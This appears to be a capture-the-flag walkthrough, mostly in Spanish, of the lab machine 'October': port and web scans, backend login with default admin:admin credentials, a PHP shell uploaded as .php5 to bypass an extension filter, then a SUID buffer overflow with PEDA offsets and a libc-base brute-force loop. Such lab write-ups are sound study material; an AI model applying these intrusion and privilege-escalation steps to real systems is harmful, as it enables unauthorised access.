# Aggressive scan of every TCP port with the NSE "vuln" category, saved in all
# three formats as october.{nmap,gnmap,xml}. -A bundles -O, -sV, -sC and
# --traceroute. --min-rate 10000 is very noisy (lab use only), and
# --script-timeout 15s aborts any script still running after 15 s, so a slow
# vuln script can silently contribute nothing to the report.
nmap -v -A -p- --min-rate 10000 --script vuln --script-timeout 15s -oA october 10.129.202.91

Pasted image 20210823133938.png

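# Baseline scan of every TCP port: default scripts, service versions and OS
# detection. Use a distinct -oA basename: the earlier vuln scan already wrote
# october.{nmap,gnmap,xml}, and nmap overwrites rather than appends, so reusing
# "october" here would destroy that output.
nmap -sC -sV -O -p- -oA october-tcp 10.129.202.91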

# UDP sweep of all 65535 ports plus OS detection; both -sU and -O need root.
# NOTE(review): a full-range UDP scan at default timing can take hours because
# most ports never answer; --top-ports or a --min-rate cap is the usual first
# pass. Kept as originally run.
nmap -O -sU -p 1-65535 -oA october-udp 10.129.202.91

# Web server misconfiguration/known-file scan of the HTTP service on port 80.
# Nikto is loud and easily detected; fine for a lab target.
nikto -host 10.129.202.91 -port 80

Pasted image 20210823134133.png

# Fingerprint the web stack (server, framework, CMS) from headers and page body.
whatweb http://10.129.202.91

Pasted image 20210823134322.png

Pasted image 20210823134453.png

http://10.129.202.91/backend — panel de administración (presumiblemente el backend de October CMS, a juzgar por el nombre de la máquina; confírmalo con la salida de whatweb).

Credenciales: admin:admin (credenciales por defecto que siguen activas en el login del backend).

Pasted image 20210823134558.png

Subimos un archivo shell.php.php5 desde el gestor Media del backend: la extensión .php5 no está en la lista negra de subida y, al parecer, el servidor la sigue interpretando como PHP (bypass del filtro de extensiones).

Pasted image 20210823134941.png

Hacemos clic en «click here» para abrir el archivo subido; al ejecutarse en el servidor obtenemos la shell (véase la captura).

Pasted image 20210823135108.png

Pasted image 20210823174235.png

Vemos el binario SUID ./usr/local/bin/ovrflw entre los resultados (la ruta sale relativa porque find se lanzó desde / sin indicar ruta inicial).

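# Enumerate every file with the setuid bit (candidates for privilege
# escalation). Anchor the search at / instead of relying on the current
# directory, restrict it to regular files, and drop the permission-denied
# noise from stderr. (The original's backslash in "\-perm" was a no-op.)
find / -type f -perm -4000 2>/dev/null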

Pasted image 20210823174312.png

Pasted image 20210823175048.png

# Fetch PEDA (gdb helper) on the attack box, to be shipped to the target.
# NOTE(review): the widely used PEDA repository is github.com/longld/peda;
# "logld" may be a typo or an impostor fork — verify before running code from
# it, since it is executed inside gdb on the target.
git clone -- https://github.com/logld/peda peda

Pasted image 20210823190610.png

# Pack the clone for transfer. The archive is gzip-compressed despite the
# .tar name; the later `tar -xf` autodetects the compression, so this works.
tar --gzip --create --verbose --file peda.tar peda

Pasted image 20210823190715.png

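# Serve the current directory so the target can fetch the tooling.
# Bind to the VPN address the target pulls from instead of the default
# 0.0.0.0, so the whole working directory is not exposed on every interface
# of the attack box for as long as the server runs.
python3 -m http.server 8888 --bind 10.10.14.125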

# On the target: pull the archive from the attack box over cleartext HTTP
# (acceptable in a lab; anyone on the path can read or swap the payload).
wget -O peda.tar http://10.10.14.125:8888/peda.tar

Pasted image 20210823191154.png

# Unpack PEDA on the target; compression is detected automatically.
tar --extract --file peda.tar

Pasted image 20210823191341.png

# Point HOME at /tmp so gdb reads /tmp/.gdbinit (the low-privilege user may
# have no writable home). NOTE(review): /tmp is world-writable, so another
# local user could plant or edit that .gdbinit before gdb loads it.
HOME=/tmp
export HOME

# Auto-load PEDA every time gdb starts. The tilde is written literally
# (not shell-expanded inside the quotes) and resolved by gdb itself.
printf '%s\n' 'source ~/peda/peda.py' >> "$HOME/.gdbinit"

Pasted image 20210823191647.png

# PEDA: emit a 500-byte cyclic pattern whose short substrings are unique, so
# whatever ends up in EIP at the crash can be mapped back to an offset.
pattern_create 500

# Run the target with the pattern as argv[1]. The argument below is a run of
# 'A's, not pattern_create's output: paste the real pattern here, otherwise
# the later pattern_offset cannot resolve the crash value (0x41384141 contains
# an '8' byte, which an all-'A' input can never produce).
r 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaAAA'

Pasted image 20210823192751.png

# Map the EIP value at the crash (0x41384141, i.e. the bytes "AA8A" in memory
# order) back to its offset in the pattern — that offset is the saved-EIP
# distance used by the exploit.
pattern_offset 0x41384141

Pasted image 20210823193210.png

# Show the shared libraries (and their load addresses) of the SUID binary.
# Run it more than once: if the libc address changes between runs, ASLR is on
# and the exploit must account for it.
ldd "$(which ovrflw)"

Pasted image 20210823194220.png

Creamos el script de explotación en Python (exploit.py, ejecutado más abajo; su contenido solo aparece en las capturas).

Pasted image 20210823210656.png Pasted image 20210823210732.png

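# Measure how often libc is mapped at the base the exploit assumes, across
# repeated loads of the SUID binary. Addresses like 0xb755a000 suggest a 32-bit
# process, where ASLR leaves libc with few possible bases (typically a few
# hundred), so a fixed guess hits after a modest number of retries; this loop
# prints one line per hit so the hit rate can be eyeballed (pipe into
# `grep -c` instead for a count).
# Fixes the original's malformed awk program ('NF(print $NF}' is a syntax
# error) and bails out early if the binary is not readable.
bin=/usr/local/bin/ovrflw
libc_base=0xb755a000   # base the exploit hard-codes, from earlier ldd runs
tries=1000
if [[ -r "$bin" ]]; then
  for ((i = 0; i < tries; i++)); do
    ldd "$bin" | grep libc | awk '{ print $NF }' | tr -d '()'
  done | grep -F -- "$libc_base"
else
  printf 'cannot read %s\n' "$bin" >&2
fi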

Pasted image 20210823202429.png

Pasted image 20210823203904.png

# Run the exploit against the SUID binary. Its source is only shown in the
# screenshots above, so the offset and libc base it relies on cannot be
# checked from this page.
python3 ./exploit.py

Pasted image 20210823210540.png
